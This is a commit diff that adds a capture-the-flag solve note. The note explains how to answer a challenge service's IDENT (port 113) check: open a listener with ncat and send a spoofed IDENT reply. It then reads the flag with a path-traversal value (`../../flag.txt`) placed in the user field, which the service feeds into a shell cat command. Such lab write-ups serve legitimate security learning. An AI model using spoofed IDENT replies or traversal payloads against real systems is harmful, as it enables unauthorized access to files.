Rename to solveHEADmaster

1 files changed, 46 insertions, 0 deletions

diff --git a/solve/notes b/solve/notes
new file mode 100644
index 0000000..2ec0493
--- /dev/null
+++ b/solve/notes
@@ -0,0 +1,46 @@
+Connect to the service
+
+By running `find /` we find out the flag file is in /flag.txt,
+but the correct contents are on the victim machine we can access
+via `ssh -p 2000 localhost`.
+
+Use `ssh -p 2000 localhost` to connect and get the following error:
+
+Connection to localhost (::1) 2000 port [tcp/*] succeeded!
+#########################################################################
+#                                                                       #
+#                            Unknown User!                              #
+#                                                                       #
+#########################################################################
+TCP Wrappers:  Connection refused! Make sure that port 113 can be reached!
+User:          unknown
+Client:        ::1
+Hostname:      localhost
+Date:          Thu Mar 14 19:50:09 UTC 2024
+
+We open up port 113 using `ncat -6 -l -p 113` (ipv6 based on description hint)
+
+Next time we connect we get a single line from the victim:
+36362,2000
+
+Googling "service port 113" we find that this is the port for the IDENT
+service which when given a src,dst port pair returns the user initiating
+the connection.
+
+If we connect again and reply with `36362,2000 : USERID : UNIX : root`
+we get the following instead:
+
+cat: /tmp/users/root: No such file or directory
+
+TCP Wrappers:  Hello root !
+User:          root
+Client:        ::1
+Hostname:      localhost
+Date:          Thu Mar 14 19:49:50 UTC 2024
+
+So for some reason, the user is used in a shell command to cat a file...
+
+Using path traversal we can read the flag:
+
+XXXXX,2000 : USERID : UNIX : ../../flag.txt
+